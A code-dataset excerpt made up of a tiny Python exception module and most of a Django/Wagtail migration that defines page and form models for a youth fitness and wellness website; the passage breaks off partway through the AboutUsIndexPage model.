| 33.55 | 68 | 0.573174 | 569 | 3,355 | 3.311072 | 0.091388 | 0.118896 | 0.220807 | 0.288747 | 0.903928 | 0.896497 | 0.896497 | 0.896497 | 0.896497 | 0.896497 | 0 | 0.023636 | 0.180328 | 3,355 | 99 | 69 | 33.888889 | 0.661455 | 0.006259 | 0 | 0.648649 | 0 | 0 | 0.109877 | 0 | 0 | 0 | 0 | 0 | 0.027027 | 1 | 0.027027 | false | 0 | 0.027027 | 0 | 0.081081 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
50177263ab82ec82cbddbc6d8898f74ea1347560 | 73 | py | Python | bigsql/err.py | wabscale/bigsql | 9ac9efc9747765a05d9161df5de725a8895ac759 | [
"MIT"
] | 1 | 2021-07-02T15:39:21.000Z | 2021-07-02T15:39:21.000Z | bigsql/err.py | wabscale/bigsql | 9ac9efc9747765a05d9161df5de725a8895ac759 | [
"MIT"
] | null | null | null | bigsql/err.py | wabscale/bigsql | 9ac9efc9747765a05d9161df5de725a8895ac759 | [
"MIT"
] | null | null | null | import pymysql.err
class big_ERROR(pymysql.err.IntegrityError):
pass | 18.25 | 44 | 0.794521 | 10 | 73 | 5.7 | 0.8 | 0.350877 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.123288 | 73 | 4 | 45 | 18.25 | 0.890625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
4a05edb6c0bca8e76cd51c3be4bdfd6230c29623 | 39,981 | py | Python | week/migrations/0001_initial.py | uno-isqa-8950/fitgirl-inc | 2656e7340e85ab8cbeb0de19dcbc81030b9b5b81 | [
"MIT"
] | 6 | 2018-09-11T15:30:10.000Z | 2020-01-14T17:29:07.000Z | week/migrations/0001_initial.py | uno-isqa-8950/fitgirl-inc | 2656e7340e85ab8cbeb0de19dcbc81030b9b5b81 | [
"MIT"
] | 722 | 2018-08-29T17:27:38.000Z | 2022-03-11T23:28:33.000Z | week/migrations/0001_initial.py | uno-isqa-8950/fitgirl-inc | 2656e7340e85ab8cbeb0de19dcbc81030b9b5b81 | [
"MIT"
] | 13 | 2018-08-29T07:42:01.000Z | 2019-04-21T22:34:30.000Z | # Generated by Django 2.2.4 on 2020-05-03 17:02
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
import wagtail.core.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
('wagtailimages', '0001_squashed_0021'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('wagtailcore', '0041_group_collection_permissions_verbose_name_plural'),
('account', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='AnnouncementAlertPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('announcements', wagtail.core.fields.RichTextField(blank=True)),
('display_warning', models.BooleanField(default=False, help_text='Check this box to display warning announcement on the website')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='Disclaimerlink',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('disclaimer', wagtail.core.fields.RichTextField(blank=True)),
('disclaimer2', models.CharField(blank=True, max_length=10000)),
('disclaimer3', models.CharField(blank=True, max_length=10000)),
('disclaimer4', models.CharField(blank=True, max_length=10000)),
('disclaimer5', models.CharField(blank=True, max_length=10000)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='DisclaimerPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('disclaimer', wagtail.core.fields.RichTextField(blank=True)),
('disclaimer2', models.CharField(blank=True, max_length=10000)),
('disclaimer3', models.CharField(blank=True, max_length=10000)),
('disclaimer4', models.CharField(blank=True, max_length=10000)),
('disclaimer5', models.CharField(blank=True, max_length=10000)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='EmailTemplates',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('subject_for_inactivity', models.CharField(blank=True, max_length=10000)),
('subject_for_group', models.CharField(blank=True, max_length=10000)),
('group_message', wagtail.core.fields.RichTextField(blank=True)),
('inactivity_message', wagtail.core.fields.RichTextField(blank=True)),
('subject_for_rewards_notification', models.CharField(blank=True, max_length=10000)),
('rewards_message', wagtail.core.fields.RichTextField(blank=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='ExtrasIndexPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('intro', wagtail.core.fields.RichTextField(blank=True)),
('description', wagtail.core.fields.RichTextField(blank=True)),
('additional', wagtail.core.fields.RichTextField(blank=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='KindnessCardPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('KindnessCard', models.CharField(blank=True, max_length=10000)),
('KindnessCard2', models.CharField(blank=True, max_length=10000)),
('KindnessCard3', models.CharField(blank=True, max_length=10000)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='PreassessmentPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('intro', wagtail.core.fields.RichTextField(blank=True)),
('thank_you_text', wagtail.core.fields.RichTextField(blank=True)),
('points_for_this_activity', models.IntegerField(blank=True, default=0)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='Print',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('body', wagtail.core.fields.RichTextField(blank=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='PrivacyPolicyLink',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('policy', wagtail.core.fields.RichTextField(blank=True)),
('policy2', models.CharField(blank=True, max_length=10000)),
('attach_file', wagtail.core.fields.RichTextField(blank=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='ProgramIndexPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('description', wagtail.core.fields.RichTextField(blank=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='QuestionPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('intro', wagtail.core.fields.RichTextField(blank=True)),
('thank_you_text', wagtail.core.fields.RichTextField(blank=True)),
('points_for_this_activity', models.IntegerField(blank=True, default=0)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='QuestionPageText',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('intro', wagtail.core.fields.RichTextField(blank=True)),
('description', wagtail.core.fields.RichTextField(blank=True)),
('thank_you_text', wagtail.core.fields.RichTextField(blank=True)),
('points_for_this_activity', models.IntegerField(blank=True, default=0)),
('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='RewardsIndexPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('intro', wagtail.core.fields.RichTextField(blank=True)),
('description', wagtail.core.fields.RichTextField(blank=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='SidebarContentPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('subject_for_announcement1', models.CharField(blank=True, max_length=10000)),
('message_announcement1', wagtail.core.fields.RichTextField(blank=True)),
('subject_for_announcement2', models.CharField(blank=True, max_length=10000)),
('message_announcement2', wagtail.core.fields.RichTextField(blank=True)),
('subject_for_announcement3', models.CharField(blank=True, max_length=10000)),
('message_announcement3', wagtail.core.fields.RichTextField(blank=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='SidebarImagePage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('subject_for_advertisement', models.CharField(blank=True, max_length=10000)),
('advertisement_image', wagtail.core.fields.RichTextField(blank=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='StatementsPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('mission', models.CharField(blank=True, max_length=200)),
('vision', models.CharField(blank=True, max_length=200)),
('values', models.CharField(blank=True, max_length=200)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='WeekPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('description', wagtail.core.fields.RichTextField(blank=True)),
('start_date', models.DateTimeField(blank=True, null=True, verbose_name='Start Date')),
('end_date', models.DateTimeField(blank=True, null=True, verbose_name='End Date')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='welcomepage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('text1', wagtail.core.fields.RichTextField(blank=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='UserActivity',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('Activity', models.CharField(max_length=50)),
('Week', models.IntegerField(null=True)),
('DayOfWeek', models.CharField(max_length=10)),
('points_earned', models.IntegerField(null=True)),
('creation_date', models.DateField()),
('updated_date', models.DateField()),
('program', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='account.Program')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Sensitive',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('intro', wagtail.core.fields.RichTextField(blank=True)),
('description', wagtail.core.fields.RichTextField(blank=True)),
('body', wagtail.core.fields.RichTextField(blank=True)),
('age_group_content', models.IntegerField(blank=True, default=0, verbose_name='Enter the age group to show the content to: 1 for 6 or younger; 2 for ages 7-10; 3 for ages 11-13; 4 for ages 14-16; 5 for 17+')),
('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='QuestionTextFormField',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('label', models.CharField(help_text='The label of the form field', max_length=255, verbose_name='label')),
('field_type', models.CharField(choices=[('singleline', 'Single line text'), ('multiline', 'Multi-line text'), ('email', 'Email'), ('number', 'Number'), ('url', 'URL'), ('checkbox', 'Checkbox'), ('checkboxes', 'Checkboxes'), ('dropdown', 'Drop down'), ('multiselect', 'Multiple select'), ('radio', 'Radio buttons'), ('date', 'Date'), ('datetime', 'Date/time'), ('hidden', 'Hidden field')], max_length=16, verbose_name='field type')),
('required', models.BooleanField(default=True, verbose_name='required')),
('choices', models.TextField(blank=True, help_text='Comma separated list of choices. Only applicable in checkboxes, radio and dropdown.', verbose_name='choices')),
('default_value', models.CharField(blank=True, help_text='Default value. Comma separated values supported for checkboxes.', max_length=255, verbose_name='default value')),
('help_text', models.CharField(blank=True, max_length=255, verbose_name='help text')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='form_field', to='week.QuestionPageText')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='QuestionFormField',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('label', models.CharField(help_text='The label of the form field', max_length=255, verbose_name='label')),
('field_type', models.CharField(choices=[('singleline', 'Single line text'), ('multiline', 'Multi-line text'), ('email', 'Email'), ('number', 'Number'), ('url', 'URL'), ('checkbox', 'Checkbox'), ('checkboxes', 'Checkboxes'), ('dropdown', 'Drop down'), ('multiselect', 'Multiple select'), ('radio', 'Radio buttons'), ('date', 'Date'), ('datetime', 'Date/time'), ('hidden', 'Hidden field')], max_length=16, verbose_name='field type')),
('required', models.BooleanField(default=True, verbose_name='required')),
('choices', models.TextField(blank=True, help_text='Comma separated list of choices. Only applicable in checkboxes, radio and dropdown.', verbose_name='choices')),
('default_value', models.CharField(blank=True, help_text='Default value. Comma separated values supported for checkboxes.', max_length=255, verbose_name='default value')),
('help_text', models.CharField(blank=True, max_length=255, verbose_name='help text')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='form_fields', to='week.QuestionPage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='PreassessmentFormField',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('label', models.CharField(help_text='The label of the form field', max_length=255, verbose_name='label')),
('field_type', models.CharField(choices=[('singleline', 'Single line text'), ('multiline', 'Multi-line text'), ('email', 'Email'), ('number', 'Number'), ('url', 'URL'), ('checkbox', 'Checkbox'), ('checkboxes', 'Checkboxes'), ('dropdown', 'Drop down'), ('multiselect', 'Multiple select'), ('radio', 'Radio buttons'), ('date', 'Date'), ('datetime', 'Date/time'), ('hidden', 'Hidden field')], max_length=16, verbose_name='field type')),
('required', models.BooleanField(default=True, verbose_name='required')),
('choices', models.TextField(blank=True, help_text='Comma separated list of choices. Only applicable in checkboxes, radio and dropdown.', verbose_name='choices')),
('default_value', models.CharField(blank=True, help_text='Default value. Comma separated values supported for checkboxes.', max_length=255, verbose_name='default value')),
('help_text', models.CharField(blank=True, max_length=255, verbose_name='help text')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='form_fields', to='week.PreassessmentPage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='PostassessmentPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('intro', wagtail.core.fields.RichTextField(blank=True)),
('thank_you_text', wagtail.core.fields.RichTextField(blank=True)),
('points_for_this_activity', models.IntegerField(blank=True, default=0)),
('start_date', models.DateTimeField(blank=True, null=True, verbose_name='Start Date')),
('end_date', models.DateTimeField(blank=True, null=True, verbose_name='End Date')),
('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='PostassessmentFormField',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('label', models.CharField(help_text='The label of the form field', max_length=255, verbose_name='label')),
('field_type', models.CharField(choices=[('singleline', 'Single line text'), ('multiline', 'Multi-line text'), ('email', 'Email'), ('number', 'Number'), ('url', 'URL'), ('checkbox', 'Checkbox'), ('checkboxes', 'Checkboxes'), ('dropdown', 'Drop down'), ('multiselect', 'Multiple select'), ('radio', 'Radio buttons'), ('date', 'Date'), ('datetime', 'Date/time'), ('hidden', 'Hidden field')], max_length=16, verbose_name='field type')),
('required', models.BooleanField(default=True, verbose_name='required')),
('choices', models.TextField(blank=True, help_text='Comma separated list of choices. Only applicable in checkboxes, radio and dropdown.', verbose_name='choices')),
('default_value', models.CharField(blank=True, help_text='Default value. Comma separated values supported for checkboxes.', max_length=255, verbose_name='default value')),
('help_text', models.CharField(blank=True, max_length=255, verbose_name='help text')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='form_fields', to='week.PostassessmentPage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='PhysicalPostPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('intro', wagtail.core.fields.RichTextField(blank=True)),
('strength', wagtail.core.fields.RichTextField(blank=True)),
('agility', wagtail.core.fields.RichTextField(blank=True)),
('flexibility', wagtail.core.fields.RichTextField(blank=True)),
('points_for_this_activity', models.IntegerField(blank=True, default=0)),
('timer_for_this_activity', models.CharField(blank=True, default=datetime.time(0, 11), help_text='Time format should be in MM:SS', max_length=20)),
('thank_you_text', wagtail.core.fields.RichTextField(blank=True)),
('start_date', models.DateTimeField(blank=True, null=True, verbose_name='Start Date')),
('end_date', models.DateTimeField(blank=True, null=True, verbose_name='End Date')),
('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='PhysicalFormField',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('label', models.CharField(help_text='The label of the form field', max_length=255, verbose_name='label')),
('field_type', models.CharField(choices=[('singleline', 'Single line text'), ('multiline', 'Multi-line text'), ('email', 'Email'), ('number', 'Number'), ('url', 'URL'), ('checkbox', 'Checkbox'), ('checkboxes', 'Checkboxes'), ('dropdown', 'Drop down'), ('multiselect', 'Multiple select'), ('radio', 'Radio buttons'), ('date', 'Date'), ('datetime', 'Date/time'), ('hidden', 'Hidden field')], max_length=16, verbose_name='field type')),
('required', models.BooleanField(default=True, verbose_name='required')),
('choices', models.TextField(blank=True, help_text='Comma separated list of choices. Only applicable in checkboxes, radio and dropdown.', verbose_name='choices')),
('default_value', models.CharField(blank=True, help_text='Default value. Comma separated values supported for checkboxes.', max_length=255, verbose_name='default value')),
('help_text', models.CharField(blank=True, max_length=255, verbose_name='help text')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='form_fields', to='week.PhysicalPostPage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='NutritionPostPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('body', wagtail.core.fields.RichTextField(blank=True)),
('morecontent', wagtail.core.fields.RichTextField(blank=True)),
('facts', wagtail.core.fields.RichTextField(blank=True)),
('intro', wagtail.core.fields.RichTextField(blank=True)),
('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='NutritionGame',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('body', wagtail.core.fields.RichTextField(blank=True)),
('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='ModelIndexPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('description', wagtail.core.fields.RichTextField(blank=True)),
('intro', models.CharField(blank=True, max_length=255)),
('ad_url', models.URLField(blank=True)),
('vertical_url', models.URLField(blank=True)),
('announcements', wagtail.core.fields.RichTextField(blank=True)),
('ad_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('vertical_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='MentalPostPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('body', wagtail.core.fields.RichTextField(blank=True)),
('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='MentalArtPostPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('body', wagtail.core.fields.RichTextField(blank=True)),
('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='LandingIndexPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('intro', wagtail.core.fields.RichTextField(blank=True)),
('description', wagtail.core.fields.RichTextField(blank=True)),
('additional', wagtail.core.fields.RichTextField(blank=True)),
('physical', wagtail.core.fields.RichTextField(blank=True)),
('nutritional', wagtail.core.fields.RichTextField(blank=True)),
('mental', wagtail.core.fields.RichTextField(blank=True)),
('relational', wagtail.core.fields.RichTextField(blank=True)),
('physicaldesc', wagtail.core.fields.RichTextField(blank=True)),
('nutritionaldesc', wagtail.core.fields.RichTextField(blank=True)),
('mentaldesc', wagtail.core.fields.RichTextField(blank=True)),
('relationaldesc', wagtail.core.fields.RichTextField(blank=True)),
('card_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('card_imageb', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('card_imagec', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('card_imaged', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='FunStuffGames',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('callout_intro', wagtail.core.fields.RichTextField(blank=True)),
('callout_message', wagtail.core.fields.RichTextField(blank=True)),
('body', wagtail.core.fields.RichTextField(blank=True)),
('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='FunStuffArt',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('callout_intro', wagtail.core.fields.RichTextField(blank=True)),
('callout_message', wagtail.core.fields.RichTextField(blank=True)),
('body', wagtail.core.fields.RichTextField(blank=True)),
('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='Fact',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('intro', wagtail.core.fields.RichTextField(blank=True)),
('description', wagtail.core.fields.RichTextField(blank=True)),
('body', wagtail.core.fields.RichTextField(blank=True)),
('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='BonusQuestionPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('intro', wagtail.core.fields.RichTextField(blank=True)),
('thank_you_text', wagtail.core.fields.RichTextField(blank=True)),
('points_for_this_activity', models.IntegerField(blank=True, default=0)),
('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='BonusQuestionFormField',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('label', models.CharField(help_text='The label of the form field', max_length=255, verbose_name='label')),
('field_type', models.CharField(choices=[('singleline', 'Single line text'), ('multiline', 'Multi-line text'), ('email', 'Email'), ('number', 'Number'), ('url', 'URL'), ('checkbox', 'Checkbox'), ('checkboxes', 'Checkboxes'), ('dropdown', 'Drop down'), ('multiselect', 'Multiple select'), ('radio', 'Radio buttons'), ('date', 'Date'), ('datetime', 'Date/time'), ('hidden', 'Hidden field')], max_length=16, verbose_name='field type')),
('required', models.BooleanField(default=True, verbose_name='required')),
('choices', models.TextField(blank=True, help_text='Comma separated list of choices. Only applicable in checkboxes, radio and dropdown.', verbose_name='choices')),
('default_value', models.CharField(blank=True, help_text='Default value. Comma separated values supported for checkboxes.', max_length=255, verbose_name='default value')),
('help_text', models.CharField(blank=True, max_length=255, verbose_name='help text')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='form_fields', to='week.BonusQuestionPage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='addstudentoftheweek',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('intro', wagtail.core.fields.RichTextField(blank=True)),
('student_name', models.CharField(blank=True, max_length=200)),
('my_favorite_color', models.CharField(blank=True, max_length=200)),
('my_favorite_healthy_snack', models.CharField(blank=True, max_length=200)),
('my_favorite_sport', models.CharField(blank=True, max_length=200)),
('my_favorite_athlete', models.CharField(blank=True, max_length=200)),
('my_friends_would_describe_me_as', models.CharField(blank=True, max_length=300)),
('am_good_at', models.CharField(blank=True, max_length=300)),
('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='AboutUsIndexPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('intro', wagtail.core.fields.RichTextField(blank=True)),
('description', wagtail.core.fields.RichTextField(blank=True)),
('ad_url', models.URLField(blank=True)),
